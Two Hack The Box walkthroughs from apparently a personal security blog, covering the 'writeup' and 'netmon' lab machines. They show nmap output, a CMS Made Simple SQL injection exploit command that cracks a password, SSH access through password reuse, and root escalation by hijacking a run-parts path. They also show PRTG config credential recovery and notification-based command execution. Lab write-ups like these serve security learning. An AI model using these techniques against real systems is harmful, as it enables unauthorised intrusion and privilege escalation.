Tag: write-up

Hackthebox writeup

Yes, the machine itself is called writeup. My first step was running nmap:

 # nmap  10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 21:54 CEST
Nmap scan report for 10.10.10.138
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds


# nmap -A -p 22,80 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 22:06 CEST
Nmap scan report for 10.10.10.138
Host is up (0.022s latency).


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   20.28 ms 10.10.12.1
2   20.47 ms 10.10.10.138


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

More info gathering of the web service

As you can see CMS Made Simple is being used.

Exploitation of the website

After digging around a bit with sqlmap and Burp without success I searched for an exploit, and voila:
https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html

The exploit was also able to crack, so I used rockyou.txt as a wordlist:

# python cmsmadesimple22-sql.py -u http://10.10.10.138/writeup/ -c -w ./rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

Login to cms is protected with a .htaccess file, creds are not valid here. Good that there is a thing called password re-use.

User flag

But ssh worked with the creds:

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux


The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.


Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul  4 14:51:59 2019 from 10.10.12.57
jkr@writeup:~$
jkr@writeup:~$ ls
pspy64s user.txt
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978

So user flag was done…

Root flag

For escalating to root I first used exploit suggester and tried the exploits, but without success.

So I did some research and came across a tool called pyspy. For transfering the file I used apache and wget.

jkr@writeup:/tmp$ ./pspy64
...
root      2456  0.0  0.6 108644  6940 ?        Ss   15:10   0:00 sshd: jkr [priv]
root      2468  0.0  0.0   4276   756 ?        S    15:10   0:00 sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
root      2469  0.0  1.0  40364 10348 ?        S    15:10   0:00 /usr/bin/python /usr/local/bin/run-parts --lsbsysinit /etc/update-motd.d
root      2470  0.0  0.0   4276   732 ?        S    15:10   0:00 /bin/sh -i 
...

What does that mean? run-parts is executing all files in /usr/local/bin/run-parts. If we can put a file here we win.

The file looks like:

cat /root/root.txt >> /tmp/.testing

Then it is straight forward:

jkr@writeup:/tmp$ vi /usr/local/sbin/run-parts
jkr@writeup:/tmp$ chmod +x  /usr/local/sbin/run-parts
jkr@writeup:/tmp$ ls -al
total 4380
drwxrwxrwt  2 root root    4096 Jul  7 16:30 .
drwxr-xr-x 22 root root    4096 Apr 19 07:31 ..
-rw-r--r--  1 root root      33 Jul  7 16:30 .testing
jkr@writeup:/tmp$ cat .testing
eeba47f60b48ef92b734f9b6198d7226

And that was it :).

Write-up hackthebox netmon

After the getting started article, here is a walkthrough for hackthebox netmon, to get an impression how to pwn machines. This was a nice one and I guess one of the the easier.

Portscan

Nmap 7.70 scan initiated Thu May 23 21:38:11 2019 as: nmap -A -oA netmon 10.10.10.152
Nmap scan report for 10.10.10.152

Host is up (0.043s latency).

Not shown: 995 closed ports

PORT    STATE SERVICE      VERSION

21/tcp  open  ftp          Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 02-03-19  12:18AM                 1024 .rnd

| 02-25-19  10:15PM                 inetpub

| 07-16-16  09:18AM                 PerfLogs

| 02-25-19  10:56PM                 Program Files

| 02-03-19  12:28AM                 Program Files (x86)

| 02-03-19  08:08AM                 Users

|02-25-19  11:49PM                 Windows
| ftp-syst:
|  SYST: Windows_NT

80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)

|_http-server-header: PRTG/18.1.37.13946

| http-title: Welcome | PRTG Network Monitor (NETMON)

|_Requested resource was /index.htm

|_http-trane-info: Problem with XML parsing of /evox/about

135/tcp open  msrpc        Microsoft Windows RPC

139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.70%E=4%D=5/23%OT=21%CT=1%CU=30959%PV=Y%DS=2%DC=T%G=Y%TM=5CE6F6C

OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%CI=I%II=I%TS=A)SEQ(SP=1

OS:07%GCD=1%ISR=108%TS=A)SEQ(SP=107%GCD=1%ISR=108%II=I%TS=A)OPS(O1=M54DNW8S

OS:T11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54D

OS:ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=

OS:80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2

OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%

OS:F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%

OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD

OS:=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL

OS:=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:

|clock-skew: mean: 11s, deviation: 0s, median: 10s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|  message_signing: disabled (dangerous, but default)

| smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2019-05-23 21:38:48

|_  start_date: 2019-05-23 21:34:54
TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   54.00 ms 10.10.12.1

2   54.08 ms 10.10.10.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Thu May 23 21:38:40 2019 -- 1 IP address (1 host up) scanned in 29.10 seconds

Connect via FTP

The user hash is easily found:

Now we have a look at the running web server. A PRTG instance is running here. After some searching the web it was clear that this might be a vulnerable version of PRTG (https://www.codewatch.org/blog/?p=453). No login with std creds (prtgadmin/prtgadmin) possible…

But we have the FTP server, which gives us some infomation:Some interesting stuff in the windows dir:

Here the credentials are encrypted. Some research show that in older versions that might be a problem (TODO, link). So I spent some time in finding valid credentials.

Also in c:\windows:

c:\ProgrammData is hidden but can be seen if you access it directly:

Get netmon prtgadmin credentials:

Something interesting in PRTG Configuration.old.bak:

After some trying I found out that the new password was: PrTg@admin2019, so this is something you have sometimes in real life, finding some credentials but still need to try around a bit. Then I followed mostly this description of the vulnerability: https://www.codewatch.org/blog/?p=453

Add a notification:

Leave defaults and choose “Execute Program” with the following settings:

Success, we can now get the hash from the test,txt file:

Pwnd! What I liked on this machine was that you needed to combine vulnerabilities. First find the credentials, then alter them to the working credentials. After that you had RCE.